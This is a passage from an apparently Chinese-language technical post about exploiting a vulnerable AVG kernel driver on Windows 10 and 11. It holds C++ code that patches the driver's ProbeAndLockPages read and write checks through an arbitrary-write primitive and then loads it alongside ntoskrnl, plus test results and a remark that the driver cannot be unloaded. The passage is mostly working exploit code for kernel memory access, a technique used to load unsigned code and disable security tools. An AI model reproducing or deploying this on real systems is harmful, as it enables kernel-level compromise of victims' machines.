        uint64_t patchReadAddress = driverBase + READ_PROBE_AND_LOCK_PAGES_OPERATION_OFFSET;
        if (!WriteMemory(device_handle, patchReadAddress, &byData, 1))
        {
                Log(L"[-] Failed to Write Memory In Patch Driver 1" << std::endl);
                avg_driver::Unload(device_handle);
                return false;
        }
 
        uint64_t patchWriteAddress = driverBase + WRITE_PROBE_AND_LOCK_PAGES_OPERATION_OFFSET;
        if (!WriteMemory(device_handle, patchWriteAddress, &byData, 1))
        {
                Log(L"[-] Failed to Write Memory In Patch Driver 2" << std::endl);
                avg_driver::Unload(device_handle);
                return false;
        }
        Log(L"[+] PatchDriver OK!\r\n");
        return true;
}
 
HANDLE avg_driver::Load() 
{
     ......
     ntoskrnlAddr = utils::GetKernelModuleAddress("ntoskrnl.exe");
    if (ntoskrnlAddr == 0) {
        Log(L"[-] Failed to get ntoskrnl.exe" << std::endl);
        avg_driver::Unload(result);
        return INVALID_HANDLE_VALUE;
    }
    
    if (!PatchDriver(result)) //不使用PatchDriver Win11上导致读取失败
    {
        Log(L"[-] Failed to Patch Driver" << std::endl);
        avg_driver::Unload(result);
        return INVALID_HANDLE_VALUE;
    }
    
    ......
}

6.运行效果

• Win 10 x64 22H2

• Win 11 x64 22621

7. 特别提示

  经过测试发现漏洞驱动加载后就不能卸载了，如果要实现多次加载需要修改相关逻辑，具体就不详述了。